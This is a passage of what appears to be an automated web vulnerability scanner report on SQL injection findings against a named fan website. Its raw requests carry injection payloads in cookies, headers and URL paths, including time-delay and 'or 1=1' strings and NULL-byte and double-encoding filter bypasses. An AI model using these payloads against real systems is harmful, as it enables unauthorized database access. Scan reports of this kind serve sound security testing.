Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:47:13 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17916

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.31. http://fanpeeps.com/greybox/gb_scripts.js [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q="

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:30 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17203

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.32. http://fanpeeps.com/greybox/gb_scripts.js [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2',0,0,0)waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17455

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.33. http://fanpeeps.com/greybox/gb_scripts.js [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload 11885055%20or%201%3d1--%20 was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=18189393611885055%20or%201%3d1--%20; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17300

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.34. http://fanpeeps.com/greybox/gb_scripts.js [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /greybox/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17371

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00''; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 50419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.35. http://fanpeeps.com/greybox/gb_scripts.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /greybox/gb_scripts.js?1%2527=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:45:30 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
</b>: Invalid argument supplied for foreach() in <b>
...[SNIP]...

Request 2

GET /greybox/gb_scripts.js?1%2527%2527=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:45:33 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 50419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.36. http://fanpeeps.com/greybox/gb_styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox',0)waitfor%20delay'0%3a0%3a20'--/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:43 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17383

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.37. http://fanpeeps.com/greybox/gb_styles.css [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q='

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17203

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.38. http://fanpeeps.com/greybox/gb_styles.css [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17435

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.39. http://fanpeeps.com/greybox/gb_styles.css [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2',0,0)waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18095

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.40. http://fanpeeps.com/greybox/gb_styles.css [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380';

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:45:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
</b>: Invalid argument supplied for foreach() in <b>
...[SNIP]...

Request 2

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380'';

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:45:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 91517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.41. http://fanpeeps.com/greybox/gb_styles.css [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936'; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17408

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.42. http://fanpeeps.com/greybox/gb_styles.css [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)')waitfor%20delay'0%3a0%3a20'--; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17281

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.43. http://fanpeeps.com/media/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /media'/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
</b>: Invalid argument supplied for foreach() in <b>
...[SNIP]...

Request 2

GET /media''/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
